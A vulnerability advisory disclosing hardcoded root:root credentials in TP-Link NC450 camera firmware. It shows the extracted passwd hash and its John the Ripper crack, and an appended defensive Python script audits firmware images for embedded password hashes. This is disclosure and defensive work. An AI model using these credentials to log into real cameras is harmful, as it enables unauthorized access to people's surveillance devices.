NC450 1.5.0 Build 181022 Rel.3A033D Hardcoded Credentials

2019.04.08
Credit: Sachin Wagh
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

*Summary:*
The NC450 is your favorable companion that meets your home and office surveillance needs, keeping you in touch with what matters most. With its smooth and durable Pan/Tilt of up to 300/110 degrees, you can turn the camera to almost any position you want and watch over a wider area of your home.

The HD Pan/Tilt Wi-Fi Camera NC450 contains hard-coded credentials within its Linux distribution image. These credentials (root:root) cannot be changed through any normal operation of the camera.

*Vendor:*
TP-LINK Technologies Co., Ltd. - http://www.tp-link.us

*Affected Version:*
NC450 1.5.0 Build 181022 Rel.3A033D

*Vendor Status:*
N/A

*Proof Of Concept:*

/home/oit/Desktop/Firmware/_NC450_1.5.0_Build_181022_Rel.3A033D.bin.extracted/jffs2-root [oit@ubuntu] [10:34]
> grep -iRn "root:" .
Binary file ./fs_1/bin/pppd matches
./fs_1/etc/passwd:1:root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh
./fs_1/etc/group:1:root:x:0:

root@kali:~# cat hash.me
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh
root@kali:~# john hash.me --show
root:root:0:0:Linux User,,,:/home/root:/bin/sh

1 password hash cracked, 0 left

*Credit:*
Sachin Wagh (@tiger_tigerboy)

*Reference:*
https://www.tp-link.com/in/home-networking/cloud-camera/nc450/
https://www.tp-link.com/in/support/download/nc450/#Firmware

Best Regards,
*Sachin Wagh*
Security Researcher
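A defender-side check for the issue described above, as an added example that is not part of the original advisory: it scans an unpacked firmware root filesystem for passwd entries that embed a password hash directly, and reports the hash scheme, whether the account is UID 0 and whether it has a login shell. The function names and the scheme table are this example's own; `ADVISORY_ENTRY` is the entry quoted in the proof of concept.

```python
# Added example (not from the advisory): flag credentials embedded in passwd
# files of an unpacked firmware root filesystem.
import os
import sys

# The /etc/passwd entry quoted in the advisory's proof of concept.
ADVISORY_ENTRY = "root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh"

# crypt(3) prefix -> (scheme name, weak for stored credentials?)
SCHEMES = {"$1$": ("md5crypt", True), "$5$": ("sha256crypt", False),
           "$6$": ("sha512crypt", False), "$2a$": ("bcrypt", False),
           "$2b$": ("bcrypt", False), "$2y$": ("bcrypt", False),
           "$y$": ("yescrypt", False)}
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}

def audit_passwd_line(line):
    """Return a finding if the entry carries its own credential, else None."""
    fields = line.rstrip("\r\n").split(":")
    if len(fields) != 7:
        return None                      # not a passwd(5) record
    user, pw, uid, _gid, _gecos, _home, shell = fields
    if pw == "x" or pw.startswith(("*", "!")):
        return None                      # shadowed or locked account
    if pw == "":
        scheme, weak = "empty", True     # no password required at all
    else:
        scheme, weak = next((v for p, v in SCHEMES.items() if pw.startswith(p)),
                            ("des-or-unknown", True))
    return {"user": user, "scheme": scheme, "weak_scheme": weak,
            "uid0": uid == "0", "interactive": shell not in NOLOGIN_SHELLS}

def audit_tree(root):
    """Audit every file named 'passwd' under an extracted firmware root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "passwd" not in files:
            continue
        path = os.path.join(dirpath, "passwd")
        with open(path, errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                finding = audit_passwd_line(line)
                if finding:
                    findings.append({"file": path, "line": lineno, **finding})
    return findings

if __name__ == "__main__":
    results = audit_tree(sys.argv[1]) if len(sys.argv) > 1 else [audit_passwd_line(ADVISORY_ENTRY)]
    print(*results, sep="\n")
```

Run with the extracted root directory as the only argument, for example as a release gate on a firmware build; any finding with `uid0` and `interactive` both true is an image-wide credential of the kind reported here.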



Copyright 2024, cxsecurity.com